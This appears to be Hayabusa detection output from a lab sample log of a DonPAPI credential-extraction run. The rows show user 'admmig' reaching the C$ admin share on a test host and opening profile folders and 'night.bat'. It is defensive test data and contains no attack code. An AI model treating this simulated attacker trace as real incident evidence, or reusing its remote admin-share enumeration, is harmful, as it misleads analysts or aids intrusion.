2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.323 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\night.bat | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.339 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.354 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.370 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.371 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.372 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.388 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.407 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.408 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx
2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.424 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\All Users\Desktop | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.439 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 
| LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.455 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.471 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Recent | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 
0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.486 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.502 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx 2021-12-12 16:16:05.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\Desktop | IP Addr: 10.23.123.11 | LID: 
